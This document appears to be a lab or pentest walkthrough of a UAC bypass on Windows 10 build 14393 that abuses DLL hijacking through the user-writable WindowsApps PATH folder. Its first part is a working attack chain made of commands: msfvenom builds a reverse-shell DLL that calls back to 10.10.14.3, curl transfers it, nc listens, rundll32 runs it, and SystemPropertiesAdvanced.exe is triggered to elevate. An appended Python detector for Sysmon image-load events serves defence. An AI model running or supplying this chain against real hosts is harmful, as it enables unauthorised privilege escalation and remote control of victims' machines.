
windows-10-14393-exploit

Reviewing path variable

We can bypass UAC by placing a malicious DLL in the "WindowsApps" folder, which is listed in the user's PATH and is writable without administrator rights.

cmd /c echo %PATH%

Generating the malicious DLL

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dll

Transfer the library

python3 -m http.server 8080
curl http://10.10.14.3:8080/srrstr.dll -o "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"

Start listener

nc -lvnp 8443

Run the DLL library

Get a reverse shell

rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Terminate any instance of the rundll32 process (run as a normal user, not in the reverse shell)

Executing SystemPropertiesAdvanced.exe on Target host

nc -lvnp 8443 (should be running)
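
Detecting the steps above from the defender's side, as an added example that is not part of the original page: it flags module loads where SystemPropertiesAdvanced.exe pulls a DLL from outside the system directories, or where any process loads a DLL from the per-user WindowsApps folder. The records are constructed samples that assume Sysmon Event ID 7 (ImageLoad) field names; `classify`, `scan` and the trusted-directory list are illustrative assumptions.

```python
import ntpath

# Binary named on this page; extend with other auto-elevating executables as needed.
WATCHED_PROCESSES = {"systempropertiesadvanced.exe"}
# Assumption: these binaries legitimately load DLLs only from these directories.
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\windows\\winsxs\\")
# Per-user directory from the page: listed in %PATH% and writable by the user.
USER_PATH_MARKER = "\\appdata\\local\\microsoft\\windowsapps\\"


def classify(event):
    """Return the list of findings for one ImageLoad-style record (may be empty)."""
    # normpath collapses "..\" segments so a traversal cannot fake a trusted prefix.
    image = ntpath.normpath(event["Image"]).lower()
    loaded = ntpath.normpath(event["ImageLoaded"]).lower()
    findings = []
    if ntpath.basename(image) in WATCHED_PROCESSES and not loaded.startswith(TRUSTED_PREFIXES):
        findings.append("auto-elevating binary loaded a DLL from outside the system directories")
    if USER_PATH_MARKER in loaded and loaded.endswith(".dll"):
        findings.append("DLL loaded from the per-user WindowsApps directory")
    if findings and event.get("Signed", "").lower() != "true":
        findings.append("loaded module is unsigned")
    return findings


def scan(events):
    """Return (event, findings) pairs for every record matching at least one rule."""
    return [(e, f) for e in events if (f := classify(e))]


# Constructed sample records (not real telemetry), using Sysmon Event ID 7 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe",
     "ImageLoaded": r"C:\Windows\SysWOW64\shell32.dll", "Signed": "true"},
    {"Image": r"C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe",
     "ImageLoaded": r"C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll",
     "Signed": "false"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ImageLoaded": r"C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll",
     "Signed": "false"},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Program Files\Example\ext.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for event, findings in scan(SAMPLE_EVENTS):
        print(event["Image"], "->", event["ImageLoaded"], findings)
```

The same rules can be applied to exported ImageLoad events by mapping each event's fields into a dict with the keys used here.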
